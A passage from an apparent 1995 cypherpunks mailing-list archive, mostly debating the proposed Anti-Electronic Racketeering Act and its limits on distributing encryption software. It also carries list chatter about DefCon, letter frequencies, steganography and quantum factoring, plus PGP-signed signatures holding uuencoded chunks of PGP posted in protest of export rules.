posters by giving them high scores, but I found it became rather pointless, as most of the posters (with a few notable exceptions) are worthwhile reading. It is still useful for subject filtering however. In any case, the concepts implemented in strn could easily be expanded and coded into other popular newsreaders and mail agents. I think this is a much better solution. Just a quick add-on thought - this whole discussion started from people talking about moderation - the above is my answer to those who say we (or any group) *needs* moderation. If any group nonetheless *chooses* to moderate, I have no quibble, but it cannot be said that it is necessary to extract signal from noise. I enjoy several moderated newsgroups and mailing lists, and wouldn't give them up for the world, but it's not for everyone. I think this is a good example of repuations at work, in good cypherpunk form. I read moderated groups and lists where the moderater in question has shown good form and judgement and thus has a good reputation - I would avoid groups moderated by those who demonstrate otherwise. It was pointed out that there is a moderated cypherpunks list (I don't know anything about - I'm assuming its some one who gets the list and forwards some part of it, the signal, to the smaller "moderated" list) This is really good example of moderation in that the unmoderated raw feed is still available. Imagine if there were two groups, rec.arts.erotica and rec.arts.erotica.moderated or somesuch, the latter being a subset of the former. That way everybody gets to have their cake and eat it too. - -- Baba baby mama shaggy papa baba bro baba rock a shaggy baba sister shag saggy hey doc baba baby shaggy hey baba can you dig it baba baba E7 E3 90 7E 16 2E F3 45 * Stuart Smith * 28 24 2E C6 03 02 37 5C * http://www.wimsey.com/~ssmith/ -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMAT21ai5iP4JtEWBAQEx1wP7BthRjlkOveACG8lbAPDu9b52PznTdEh7 TYLyZGR9/HqQc3ExLMb0051Lo3LaSbh4T7BM6/ZHNOeLZpi4lVqzu7fJCK2dA33Q a2emExbanU/YPnIdiuZZ/bOcWhUbmdDRJ0TttNja1jLpmokQ6RpYs3P2ke+jfi19 rjCwQYhc4oM= =hxjj -----END PGP SIGNATURE----- From tbyfield at panix.com Thu Jul 13 09:03:12 1995 From: tbyfield at panix.com (Ted Byfield) Date: Thu, 13 Jul 95 09:03:12 PDT Subject: Anti-Everything-Ever Act Message-ID: Grassley's latest nonsense has got me thinking again about the rapidly rising demonization of computers/networks/the net/etc. Remarks like... >the wire fraud statute which has been successfully used by prosecutors for >many use[r]s, will be amended to make fraudulent schemes which use computers >a crime. ...boggle the mind, since it'd be all but impossible to commit wire fraud _without_ involving a "computer." The obvious effect of legislation crafted according this kind of pseudo-thought would/will be to ensure that there's a very firm line between, bluntly, haves and have-nots--"haves" being those who are exempted by various legal machinations from this ever-expanding universe of recriminalizations of the same old actions. If Arthur commits wire fraud, he's making use of telcos' "computers" and wires to commit fraud; is his action qualitatively different if he uses NetPhone or Maven to accomplish exactly the same deed? If he uses a 12-yr-old answering machine in the process, he probably isn't using a "computer" to commit wire fraud; but if he uses a brand-new digital machine, or his kids got him a Compaq Presario, and he uses it for voice mail--he probably _is_ using a "computer." It can't reasonably be argued that the use of newer technology has any effect whatsoever--but it can of course be legislated. We're seeing more and more of this addle-headed legislation coming down the pike, and more and more of it will eventually become law: the effect, above all, will be to make just about any use of a computer potentially quite dangerous. For example, lying about your income on a credit card application is, I'm told, potential bank fraud; if things continue as they are, soon enough Mary could get slapped with yet another charge for printing answers on her dishonest application rather than writing them by hand. That isn't in any legislation I've seen, but how far off can it be? I know, I know, I'm preaching to the choir... Why? I'm going to start working on an essay (and if the wind blows right, it'll be an op-ed) about this hazy question--not that op-eds have much effect. :( Anyway, if any of y'all have archived remarks by various Kongress types, pointers, dim memories about spectacularly stupid statements, please send them my way off list: the essay's going to focus not on legislation per so but, rather, on the remarks that'll show how little these guys understand and how dangerous their incomprehension is. Much obliged, Ted From hayden at krypton.mankato.msus.edu Thu Jul 13 09:19:32 1995 From: hayden at krypton.mankato.msus.edu (Robert A. Hayden) Date: Thu, 13 Jul 95 09:19:32 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) In-Reply-To: <9507131519.AA17335@toad.com> Message-ID: On Thu, 13 Jul 1995, Brian A. LaMacchia wrote: > What worries me is the first sentence: "each act of distributing > software is considered a predicate act." It's not clear to me whether > this applies to (a)(1) unlicensed software or (a)(2) encryption programs > (or perhaps both). Notice that (a)(1) says "transfer" not "distribute". > Perhaps the act of putting Alleged-RC4 on a FTP site is one act and > mailing a copy to Cypherpunks is another act. That might be two > distributions and thus two predicate acts. Of course, when you mail it to the cypherpunks list, the program goes to 500+ people, sot hat's 500+ acts. And who knows how many people connect to the FTP site, but everybody on the internet COULD connect, so that's 40,000,000 acts. Welcome to a 6x6 cell with a roommate named Bubba that wants to make you his wife. ____ Robert A. Hayden <=> Cthulhu Matata \ /__ -=-=-=-=- <=> -=-=-=-=- \/ / Finger for Geek Code Info <=> hayden at krypton.mankato.msus.edu \/ Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden From tedwards at src.umd.edu Thu Jul 13 09:23:27 1995 From: tedwards at src.umd.edu (Thomas Grant Edwards) Date: Thu, 13 Jul 95 09:23:27 PDT Subject: RACIST MILITIA: ATF In-Reply-To: <9507131048.AA09393@vampire.science.gmu.edu> Message-ID: On Thu, 13 Jul 1995, Tim Scanlon wrote: > I can confirm this, and a story was broadcast on the local > ABC news affiliate (WJLA) that talked about this and Waco > some. Interestingly enough, WJLA is on the net (note http://www.access.digex.net/~wjla/wjla.html) -Thomas From adam at bwh.harvard.edu Thu Jul 13 09:42:23 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Thu, 13 Jul 95 09:42:23 PDT Subject: DefCon roomshare? Message-ID: <199507131639.MAA07472@spl.bwh.harvard.edu> Anyone interested in sharing a room at DefCon? I'm fairly unobtrusive, don't smoke, and am neat enough to live with for a few days. :) Also, I'm looking for a (English text) letter frequency table. Anyone have one online? Adam -- "It is seldom that liberty I Support The Phil of any kind is lost all at Zimmermann legal defense fund once." -Hume http://www.netresponse.com/zldf ------------------ PGP.ZIP Part [001/713] ------------------- M4$L#!!0````(`">9ZQX3(*,_DG8!`-JF`P`'````4$=0+D581>S;=UQ3U__X M\9M!$E8,TT at PJ$10$1=*41%WW`KX$=Q[M5KK`&R%(HH+(T.M"S>NME8K=31N M:A$[K+5(K:O5BE405ZE:1"3?UTW`:K_]\/G\?O_^?CX>3^_-S;GGO,^\`^@W ------------------------------------------------------------- for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/ From mclow at coyote.csusm.edu Thu Jul 13 09:43:23 1995 From: mclow at coyote.csusm.edu (Marshall Clow) Date: Thu, 13 Jul 95 09:43:23 PDT Subject: Anti-Electronic Racketeering Act of 1995 Message-ID: No one seems to have pointed this out, so: (maybe it's obvious to everyone else) > "Sec. 1030A. Racketeering-related crimes involving computers > "(a) It shall be unlawful-- > > . . . > > "(2) to distribute computer software that encodes or encrypts > electronic or digital communications to computer networks that the > person distributing knows, or reasonably should know, is accessible to > foreign nationals and foreign governments, regardless of whether such > software has been designated nonexportable." > IANAL, but it seems to me that if I EMAIL a copy of PGP to, say, Tim May, that I have just "distributed computer software .... to a computer network ...accessible to foreign nationals ..." even though it was "private" e-mail. Comments, anyone? Anyone? Bueller? ;-) >Get a copy of this bill from: > ftp://ftp.loc.gov/pub/thomas/c104/s974.is.FTP >and read it. > Betcher ass. -- Marshall "The constitution. It's not perfect, but it's a damn sight better than what we've got." From perry at imsi.com Thu Jul 13 09:46:21 1995 From: perry at imsi.com (Perry E. Metzger) Date: Thu, 13 Jul 95 09:46:21 PDT Subject: Anti-Electronic Racketeering Act of 1995 In-Reply-To: Message-ID: <9507131646.AA12585@snark.imsi.com> Marshall Clow writes: > > > > "(2) to distribute computer software that encodes or encrypts > > electronic or digital communications to computer networks that the > > person distributing knows, or reasonably should know, is accessible t o > > foreign nationals and foreign governments, regardless of whether such > > software has been designated nonexportable." > > > IANAL, but it seems to me that if I EMAIL a copy of PGP to, say, Tim > May, that I have just "distributed computer software .... to a computer > network ...accessible to foreign nationals ..." even though it was > "private" e-mail. Depends on how "computer network" is defined in the statute. Perry From perry at imsi.com Thu Jul 13 10:07:54 1995 From: perry at imsi.com (Perry E. Metzger) Date: Thu, 13 Jul 95 10:07:54 PDT Subject: full text of the Facism bill Message-ID: <9507131707.AA12032@webster.imsi.com> Full text of the "Facism In America" bill, called by its purveyors an "anti-racketeering" bill, can be found in... ftp://ftp.loc.gov/pub/thomas/c104/s974.is.FTP .pm From stewarts at ix.netcom.com Thu Jul 13 10:17:24 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Thu, 13 Jul 95 10:17:24 PDT Subject: CRYPTO: Anti-Electronic Racketeering Act of 1995 Message-ID: <199507131715.KAA17445@ix3.ix.netcom.com> > ftp://ftp.loc.gov/pub/thomas/c104/s974.is.FTP Sigh. The EFF moves out of Washington for _15_minutes_ and what happens? :-) # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com From jim at acm.org Thu Jul 13 10:18:55 1995 From: jim at acm.org (Jim Gillogly) Date: Thu, 13 Jul 95 10:18:55 PDT Subject: VENONA web page Message-ID: <199507131718.KAA24249@mycroft.rand.org> Check out http://www.fas.org/pub/gen/fas/irp/venona/ Jim Gillogly Highday, 20 Afterlithe S.R. 1995, 17:18 From mclow at coyote.csusm.edu Thu Jul 13 10:25:40 1995 From: mclow at coyote.csusm.edu (Marshall Clow) Date: Thu, 13 Jul 95 10:25:40 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) Message-ID: > "Sec. 1030A. Racketeering-related crimes involving computers > "(a) It shall be unlawful-- > . . . > "(2) to distribute computer software that encodes or encrypts > electronic or digital communications to computer networks that the > person distributing knows, or reasonably should know, is accessible to > foreign nationals and foreign governments, regardless of whether such > software has been designated nonexportable." > So much for compression software, too. :-( Pst! Anyone want a copy of gzip? PKZip? Drop*Stuff? -- Marshall Marshall Clow Aladdin Systems mclow at coyote.csusm.edu Warning: Objects in calendar are closer than they appear. From MINITERS at Citadel.edu Thu Jul 13 10:33:18 1995 From: MINITERS at Citadel.edu (Syl Miniter 803-768-3759) Date: Thu, 13 Jul 95 10:33:18 PDT Subject: who knows about Security First Network Bank Message-ID: <01HSTNFV105Y8Y5C1T@Citadel.edu> There is an extensive article in the July issue of "Bank Technology News about a startup Internet bank by the name above. Does anyone know about this outfit. From samman at CS.YALE.EDU Thu Jul 13 10:42:31 1995 From: samman at CS.YALE.EDU (Rev. Ben) Date: Thu, 13 Jul 95 10:42:31 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) In-Reply-To: Message-ID: On Thu, 13 Jul 1995, Marshall Clow wrote: > > "Sec. 1030A. Racketeering-related crimes involving computers > > "(a) It shall be unlawful-- > > . . . > > "(2) to distribute computer software that encodes or encrypts > > electronic or digital communications to computer networks that the > > person distributing knows, or reasonably should know, is accessible to > > foreign nationals and foreign governments, regardless of whether such > > software has been designated nonexportable." > > > So much for compression software, too. :-( > Pst! Anyone want a copy of gzip? PKZip? Drop*Stuff? Those of you who have done complexity theory will take issue with the word 'encode'--the fact that it is binary is an encoding scheme--a simple one, but an encoding scheme in a language L2 nonetheless. Ben. ____ Ben Samman..............................................samman at cs.yale.edu I have learned silence from the talkative, toleration from the intolerant, and kindness from the unkind; yet, strange, I am ungrateful to those teachers.-- K. Gibran. SUPPORT THE PHIL ZIMMERMANN LEGAL DEFENSE FUND! For information Email: zldf at clark.net http://www.netresponse.com/zldf From tcmay at sensemedia.net Thu Jul 13 10:45:27 1995 From: tcmay at sensemedia.net (Timothy C. May) Date: Thu, 13 Jul 95 10:45:27 PDT Subject: Bubba Message-ID: At 4:19 PM 7/13/95, Robert A. Hayden wrote: >40,000,000 acts. Welcome to a 6x6 cell with a roommate named Bubba that >wants to make you his wife. Careful here, Robert! Bubba has not yet been tried and convicted. I admit that the allegations about Mena, drugs, Whitewater, S & Ls, and abuse of state office are fairly serious, but he has not yet even been formally charged. --Tim May .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at sensemedia.net | anonymous networks, digital pseudonyms, zero 408-728-0152 | knowledge, reputations, information markets, Corralitos, CA | black markets, collapse of governments. Higher Power: 2^756839 | Public Key: PGP and MailSafe available. "National borders are just speed bumps on the information superhighway." From jya at pipeline.com Thu Jul 13 10:58:09 1995 From: jya at pipeline.com (John Young) Date: Thu, 13 Jul 95 10:58:09 PDT Subject: VENONA web page Message-ID: <199507131756.NAA18398@pipe3.nyc.pipeline.com> Responding to msg by jim at acm.org (Jim Gillogly) on Thu, 13 Jul 10:18 AM > >Check out http://www.fas.org/pub/gen/fas/irp/venona/ Amazing IC links from this stepstone. Ebony NRO with a nascent homepage! Must be budget-cut-itis. From cp at proust.suba.com Thu Jul 13 10:58:39 1995 From: cp at proust.suba.com (alex) Date: Thu, 13 Jul 95 10:58:39 PDT Subject: Anti-Electronic Racketeering Act of 1995 In-Reply-To: Message-ID: <199507131802.NAA01316@proust.suba.com> > IANAL, but it seems to me that if I EMAIL a copy of PGP to, say, Tim > May, that I have just "distributed computer software .... to a computer > network ...accessible to foreign nationals ..." even though it was > "private" e-mail. It seems to me that this bill is so broad as to be unworkable, and that could work in our favor. I haven't read the full text, and I'm not a lawyer, but my reading of the excerpts posted here suggest that even stuff that's been *approved* for export by NSA could be prohibited. What would be the status of stuff like NIS+ under this bill? The Netscape commerce server? From perry at imsi.com Thu Jul 13 11:00:08 1995 From: perry at imsi.com (Perry E. Metzger) Date: Thu, 13 Jul 95 11:00:08 PDT Subject: mistake on my part Message-ID: <9507131759.AA12314@webster.imsi.com> I made a small mistake -- the new bill does *not* make it a crime to make crypto software available at Egghead -- but it does more or less make distribution of crypto software over the internet impossible if it isn't an escrow based system. Perry From koontz at MasPar.COM Thu Jul 13 11:03:52 1995 From: koontz at MasPar.COM (koontz at MasPar.COM) Date: Thu, 13 Jul 95 11:03:52 PDT Subject: Anti-Electronic Racketeering Act of 1995 Message-ID: <9507131806.AA01162@homeboy.local> >> IANAL, but it seems to me that if I EMAIL a copy of PGP to, say, Tim >> May, that I have just "distributed computer software .... to a computer >> network ...accessible to foreign nationals ..." even though it was >> "private" e-mail. > >Depends on how "computer network" is defined in the statute. Its added language. "computer network" is not defined. Catcha' 22. From tcmay at sensemedia.net Thu Jul 13 11:07:33 1995 From: tcmay at sensemedia.net (Timothy C. May) Date: Thu, 13 Jul 95 11:07:33 PDT Subject: Crisis Overload (re Electronic Racketeering) Message-ID: Folks, I'm not going to exhort you to fight this latest travesty, to send angry letters to your senators and representatives. Every couple of months there's been a new legislative attack on what were once basic American freedoms. (Sorry to focus on America. I'm sure you folks in the liberty-loving paradises of, say, Germany, are gloating over our hand-wringing.) We're losing the war. We can send in donations to the NRA and EFF, offer our support to the ACLU and EPIC, but the tide just keeps rolling in, washing away our efforts. The full-time lawmakers in D.C. can proliferate new repressive laws much faster than we can fight them. Our focus on this list has been on crypto, and crypto is finally coming under the massive assault we knew would come from the earliest rumblings several years ago about "key escrow." Clipper was the warning shot, the current "War on the Internet" (fed by scare stories and hysteria) is part of the propaganda war, and now this bipartisan bill to expand the RICO Act to include any non-GAK implementation of crypto is the nail in the coffin. No wonder Stu Baker and Ron Lee were so smug at the last CFP. Ordinary lobbying is probably a lost cause. The EFF tried to "work with" the government (Administration, Congress) on the Digital Telephony Bill, and got rolled (in the opinion of many, even in the governing circles of EFF). This latest assault is probably unstoppable. The co-sponsorship by Sen. Leahy, once seen as an ally of the EFF (recall the attempts to get the Leahy alternative to Exon adopted), and the enthusiastic support of Republicans, Democrats, and the intelligence community means that GAK is coming. Oh, and the use of RICO and "conspiracy" in such a central way fulfills Whit Diffie's prediction of a few years ago that the main way crypto will be controlled is through such laws, by spreading fear, uncertainty, and doubt amongst users and corporations. Make the corporations so paranoid that they'll crack down on employees, adopt GAK methods, and freeze out the "street corner user" of crypto. (If the only users of PGP and other non-GAK tools are fringe groups and underground communities, then the main goals will have been achieved. The public use of PGP will have been squelched, the public use of anonymous cash will have been suppressed, and the social control goals will have been achieved. ) I think it's time to abandon all lobbying efforts...they don't appear to be working, and the government is proliferating new laws faster than we can fight them. The only hope is to more rapidly deploy crypto, to reach the "point of no return." Optimistically, we may already be there (the views expressed by many of us). Pessimistically, the application of RICO laws and civil forfeiture could put any of us who advocate crypto use and evasion of the new laws into a precarious position. This is enough to say for now. Suffice it to say I view the latest Grassley proposed legislation to be the culmination of the past several years worth of anti-liberty legislation. A much bigger threat than Clipper. In fact, it's what many of us saw implicit in Clipper. --Tim May .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at sensemedia.net | anonymous networks, digital pseudonyms, zero 408-728-0152 | knowledge, reputations, information markets, Corralitos, CA | black markets, collapse of governments. Higher Power: 2^756839 | Public Key: PGP and MailSafe available. "National borders are just speed bumps on the information superhighway." From perry at imsi.com Thu Jul 13 11:08:16 1995 From: perry at imsi.com (Perry E. Metzger) Date: Thu, 13 Jul 95 11:08:16 PDT Subject: Anti-Electronic Racketeering Act of 1995 In-Reply-To: <9507131806.AA01162@homeboy.local> Message-ID: <9507131807.AA12711@snark.imsi.com> koontz at MasPar.COM writes: > >Depends on how "computer network" is defined in the statute. > > Its added language. "computer network" is not defined. Catcha' 22. I just read the bill -- it has no definitions of anything. Very disturbing. .pm From erc at khijol.intele.net Thu Jul 13 11:11:47 1995 From: erc at khijol.intele.net (Ed Carp [khijol Sysadmin]) Date: Thu, 13 Jul 95 11:11:47 PDT Subject: DefCon roomshare? In-Reply-To: <199507131639.MAA07472@spl.bwh.harvard.edu> Message-ID: On Thu, 13 Jul 1995, Adam Shostack wrote: > Also, I'm looking for a (English text) letter frequency table. > Anyone have one online? Did you just wnat the letters in order of frequency, or with a numeric distribution per 1000? Here's just a list, although you should be able to whip out a quick C program to do both fairly quickly: etaonrishdlfcmugypwbvkxjqz -- Ed Carp, N7EKG Ed.Carp at linux.org, ecarp at netcom.com 801/534-8857 voicemail 801/460-1883 digital pager Finger ecarp at netcom.com for PGP 2.5 public key an88744 at anon.penet.fi Q. What's the trouble with writing an MS-DOS program to emulate Clinton? A. Figuring out what to do with the other 639K of memory. From frissell at panix.com Thu Jul 13 11:11:57 1995 From: frissell at panix.com (Duncan Frissell) Date: Thu, 13 Jul 95 11:11:57 PDT Subject: New Country Conference Message-ID: <199507131811.OAA06672@panix.com> I should have mentioned this before but: New Country Conference This Saturday July 15th The New Country Foundation's first annual conference. Gramercy Park Hotel (Lexington Avenue & 21st Street) New York City 9:30am Admission is $35.00 at the door Speakers: Mike Oliver, author of "A New Constitution for a New Country." Richard Morris, President of Sea Structures, Inc. -- Developer of the Seacell floating platform technology. and a number of others. Info from Marc Joffe at 71045.142 at compuserve.com. I will be there representing the "New Country in Cyberspace" heresy. DCF "Don't waste your time and money forming a new country in the physical realm. Bits are cheaper than atoms and encrypted bits are stronger than the strongest atoms." From syshtg at gsusgi2.Gsu.EDU Thu Jul 13 11:39:36 1995 From: syshtg at gsusgi2.Gsu.EDU (Tom Gillman) Date: Thu, 13 Jul 95 11:39:36 PDT Subject: Grassley's Anti-Ridiculous Act Message-ID: <199507131839.OAA03488@gsusgi2.Gsu.EDU> OK...let's see... "shall be unlawful for any person to damage or threaten to damage electronically or digitally stored data..." Does that mean i can't erase my floppies anymore? :) Or, is it that I can't say, "I'm gonna format you!" and then not do it? Scratching your CDs would be illegal. When you get down to it, your brain is an electrochemical computer. You're no longer allowed to forget anything, either. "But storage in your brain is not digital!", you say.. Electronically _or_ digitally stored. Swapfiles are right out. Writeable memory is out in general. "unlawful to distribute unlicensed software..." There goes shareware. Freeware's still okay, I guess. Do many people treat shareware as anything more than freeware? The Steve JAckson clause at the end about work materials is cute, but the law doesn't seem to require giving the data back. And the clause about being able to enter evidence obtained electronically via 3rd party is interesting. Means an administrator can legally store email and turn it over... This bill is so monumentally stupid I can't believe it. Tom -- Tom Gillman, Unix/AIX Systems Weenie |"For a privacy advocate to determine Wells Computer Center-Ga. State Univ. |the best way to do key escrow is like (404) 651-4503 syshtg at gsusgi2.gsu.edu |a death penalty opponent choosing I'm not allowed to have an opinion. |between gas or electricity"-D.Banisar key to UNIX: echo '16i[q]sa[ln0=aln100%Pln100/snlbx]sbA0D4D465452snlbxq'|dc From Doug.Hughes at Eng.Auburn.EDU Thu Jul 13 11:46:21 1995 From: Doug.Hughes at Eng.Auburn.EDU (Doug Hughes) Date: Thu, 13 Jul 95 11:46:21 PDT Subject: The end of public key cryptography as we know it? Message-ID: <199507131846.NAA06768@netman.eng.auburn.edu> An article posted on sci.crypt stated that quantum factoring is real and that an article was posted in this month's Science magazine. The author of the post says this would make factoring a 10 bit number the same time as factoring a 100000000 bit number. A wonder how long it is before every major government in the world has one of these. Makes RSA's future kind of moot doesn't it?? I definitely have to read this article, but I thought I'd post it here for those that weren't aware or that hadn't heard. I wonder how long it will take before they can figure out how to do this for other computationally intensinve problems like N-th roots. (To make Diffie Hellman moot as well). It's beginning to seem that mathematically challenging algorithms aren't going to be that challenging for long. I have no details other than what is posted here. Perhaps somebody could post a better synopsis than what was in sci.crypt? (I plan on reading it for myself anyway, which I imagine most other people here will be doing as soon as they can) Doug Hughes Engineering Network Services doug at eng.auburn.edu Auburn University From aba at dcs.exeter.ac.uk Thu Jul 13 11:50:59 1995 From: aba at dcs.exeter.ac.uk (aba at dcs.exeter.ac.uk) Date: Thu, 13 Jul 95 11:50:59 PDT Subject: mistake on my part Message-ID: <22250.9507131850@exe.dcs.exeter.ac.uk> Perry Metzger writes on cpunks: > I made a small mistake -- the new bill does *not* make it a crime to > make crypto software available at Egghead -- but it does more or > less make distribution of crypto software over the internet > impossible if it isn't an escrow based system. I thought there was some kind of "read my lips" type statement about not mandating key escrow a short while ago. Making it illegal to not use escrow on the internet (in the US and certain materials) sounds dangerously close to mandating key escrow. Also I remember one list member making a prediction, that as they'd said _definately no key escrow_, that you could bet your ass that meant exactly the opposite, and that it would rear it's head anytime soon. I think the poster even had a prediction in terms of months, but don't have the original post handy, looks like he was right. Anyway these things are in stages: 1. voluntary key escrow 2. mandatory key escrow for certain materials 3. mandatory key escrow across the board If they pull this off stage 2, I wonder how long till stage 3, I think it'll be time to leave the sinking ship while exit visas are still granted! Adam -- ------------------ PGP.ZIP Part [025/713] ------------------- M83PL=@FR8ES%:6Q"(F9A#)K!&_;X4TXZ?(T]6(]`>$*.^]3K*K["(239)\@F MHA\"<%"5(%N->/2!'>X3XPU<0!Y,F``58RK(F;K#XD2,^`F[L09CT1>MH,7/ MC at FR+[`#J_`.6J`QW&"'YPZ4A[,XC10,0@\T1R.H\52,%3N1CI\TY('#M1)D ------------------------------------------------------------- for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/ From lmccarth at cs.umass.edu Thu Jul 13 11:55:51 1995 From: lmccarth at cs.umass.edu (L. McCarthy) Date: Thu, 13 Jul 95 11:55:51 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) In-Reply-To: <9507131535.AA12389@snark.imsi.com> Message-ID: <9507131855.AA04443@cs.umass.edu> Perry writes: > This law would also criminalize selling crypto software -- even > emasculated crypto software -- at Egghead, by the way. Remember, even > *if the crypto software is exportable* its a crime. It also would > criminalize the distribution of ROT-13. I'm not making either of these > things up. Draconian as it is, you seem to be overlooking some of the (ever so faintly) mitigating clauses of this Grass-t-ley bill. Pre-arranged GAK is an admissible excuse for dodging the crypto ban, so ROT-13 could still be distributed. Why do you think Egghead couldn't sell crypto any more ? It's not a computer network by any definition I've heard so far.... -Futplex GAK: it's not just a bad idea, it may soon be the law ! From perry at imsi.com Thu Jul 13 11:57:52 1995 From: perry at imsi.com (Perry E. Metzger) Date: Thu, 13 Jul 95 11:57:52 PDT Subject: Timothy C. May: Re: Crisis Overload (re Electronic Racketeering) Message-ID: <9507131857.AA12796@snark.imsi.com> Well, I guess I've been plonked by no less than Tim. Time will tell which of us is correct. ------- Forwarded Message To: perry at imsi.com From: tcmay at sensemedia.net (Timothy C. May) Subject: Re: Crisis Overload (re Electronic Racketeering) At 6:30 PM 7/13/95, Perry E. Metzger wrote: >Tim, I respect your opinions a lot, but I don't think you know squat ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ >about this topic. You don't understand how Washington works. I believe >I have a better grasp on this than you do. Its hard, but not even >remotely impossible, to derail this crap. We should make every >possible effort to do so. The defeatism you are emitting is silly. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Perry, I have all I'm going to take of your acerbic rudeness to me. I will no longer be responding to any of your messages. - --Tim .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at sensemedia.net | anonymous networks, digital pseudonyms, zero 408-728-0152 | knowledge, reputations, information markets, Corralitos, CA | black markets, collapse of governments. Higher Power: 2^756839 | Public Key: PGP and MailSafe available. "National borders are just speed bumps on the information superhighway." ------- End of Forwarded Message From hayden at krypton.mankato.msus.edu Thu Jul 13 12:10:27 1995 From: hayden at krypton.mankato.msus.edu (Robert A. Hayden) Date: Thu, 13 Jul 95 12:10:27 PDT Subject: Crisis Overload (re Electronic Racketeering) In-Reply-To: Message-ID: On Thu, 13 Jul 1995, Timothy C. May wrote: > I think it's time to abandon all lobbying efforts...they don't appear to be > working, and the government is proliferating new laws faster than we can > fight them. > > The only hope is to more rapidly deploy crypto, to reach the "point of no > return." Optimistically, we may already be there (the views expressed by > many of us). Pessimistically, the application of RICO laws and civil > forfeiture could put any of us who advocate crypto use and evasion of the > new laws into a precarious position. Unfortunately, a system of social engineering needs to be adopted to get massive use of cryptography started. This means, and I advocated this from the day I entered this forum, that programs such as PGP need to be redesigned so that the a user friendly . . . so user friendly that any Joe Moron can figure out not only how to use them, but also how it helps them and how it is "good" for them. This means that we need simplified key management easy enough for the point-and-click masses to utilize. This means that common mailing programs, From Elm and Pine to AOLs and Computer$erve's mailers need to have TRANSPARENT signing of mail messages and near-transparent encryption of messages. This means that we need to stop lobbying the governemtn (they dont' listen) and start lobbying Big Business, like IBM, MicroSoft, Apple, etc, to start including encryption hooks in their software. And if PGP is a problem, International PGP might be an option. And if there are problems with patent infringements and that kind of crap, then we (the concerned people of the global network) need to develop a free encrytion scheme that can do everything PGP can do and still be legal. Unfortuately, all I can do is stand on the sidelines and cheer, because I am not a programmer; I'm a user and a teacher. We've seen the enemy, that the are the 535 senators and representatives in D.C., and the staff in the White House. It's time to shore up our allies and enter the battle witht he best weapons we have; information and popular use. > In fact, it's what many of us saw implicit in Clipper. Yup. We all saw it with clipper. We were all called paranoid. Guess so... ____ Robert A. Hayden <=> Cthulhu Matata \ /__ -=-=-=-=- <=> -=-=-=-=- \/ / Finger for Geek Code Info <=> hayden at krypton.mankato.msus.edu \/ Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden From jlasser at rwd.goucher.edu Thu Jul 13 12:17:24 1995 From: jlasser at rwd.goucher.edu (Jon Lasser) Date: Thu, 13 Jul 95 12:17:24 PDT Subject: def'n of "computer network" Message-ID: Bet you 10-1 that "Computer Network" as implemented in the new bill will refer to any computing system that could possibly defend /itself/ through common carrier status. IE including small non-networked fringe BBSs that attempt to claim "common carrier" status. And many networks that don't claim common carrier status, too. The real solution to the crypto-legalization problem is anonymity. Seeing as I've not checked the bill out yet, nor am I a lawyer, I can't say what the implications for that are. If there are anti-remailer implications, the solution may be to build tools with "security flaws" (ie remailing capability). I know that this has been discussed before, but this is the time to implement it. Obviously, the information about the "security holes" will have to be spread widely, but the flaws will have to be built so deep in the design as to not be removable. In addition, now is the time to deploy stego, on a massive scale. How many stego programs have been released for Unix? Can these be integrated with mailing programs in the same way that PGP has been? What would be the legal liability of the maintainer of a common-carrier status system that had a guest account which had been (or based on the current legislation) could be used for anonymity/crypto stuff? If he's liable, does this mean that system administrators are liable for any potential security hole in their system that a random evil internet hacker uses to abuse another system? Hmmm... Usenet alt.binaries.pictures.barney + stego software + unmaintained 'guest' account on a random system = ??? Any lawyers? Jon ------------------------------------------------------------------------------ Jon Lasser (410) 494-3253 Visit my home page at http://www.goucher.edu/~jlasser/ You have a friend at the NSA: Big Brother is watching. Finger for PGP key. From perry at imsi.com Thu Jul 13 12:25:11 1995 From: perry at imsi.com (Perry E. Metzger) Date: Thu, 13 Jul 95 12:25:11 PDT Subject: Crisis Overload (re Electronic Racketeering) In-Reply-To: Message-ID: <9507131924.AA12834@snark.imsi.com> "Robert A. Hayden" writes: > We've seen the enemy, that the are the 535 senators and representatives > in D.C., and the staff in the White House. It's time to shore up our > allies and enter the battle witht he best weapons we have; information > and popular use. As unpleasant as the congress is, it isn't the enemy. The governmental forces desiring control are not the same as the congress. Congressmen are by and large harried and ignorant people. They have no idea what any of this is about. We have the choice of letting Louis Freeh do all the educating, or having a white shoe Washington PR firm do some of the educating, too. I favor the latter approach. This is not to say that we shouldn't be widely deploying crypto -- we should. (Of course, offshore sites will always have crypto available, but...) This is also not to say that Congress doesn't pass very bad laws. However, I very, very strongly urge that we not assume that nothing can be done. Just winning a couple years time could totally alter the landscape. Perry From perry at imsi.com Thu Jul 13 12:27:49 1995 From: perry at imsi.com (Perry E. Metzger) Date: Thu, 13 Jul 95 12:27:49 PDT Subject: def'n of "computer network" In-Reply-To: Message-ID: <9507131927.AA12842@snark.imsi.com> Jon Lasser writes: > In addition, now is the time to deploy stego, on a massive scale. I've said it before, and I'll say it again. My opinion is that stegonography "standards" are useless. Anyone can try unpeeling the GIFs and see if something interesting shows up inside. That means that the only useful stego suffers from the defect that symmetric key cryptography suffers from -- you have to have made serious pre-arrangements with the counterparty. Perry From hayden at krypton.mankato.msus.edu Thu Jul 13 12:34:28 1995 From: hayden at krypton.mankato.msus.edu (Robert A. Hayden) Date: Thu, 13 Jul 95 12:34:28 PDT Subject: mistake on my part In-Reply-To: <22250.9507131850@exe.dcs.exeter.ac.uk> Message-ID: On Thu, 13 Jul 1995 aba at dcs.exeter.ac.uk wrote: > If they pull this off stage 2, I wonder how long till stage 3, I think > it'll be time to leave the sinking ship while exit visas are still > granted! And go where? I know i'm living in a shell, but I've never heard a difinitive answer of 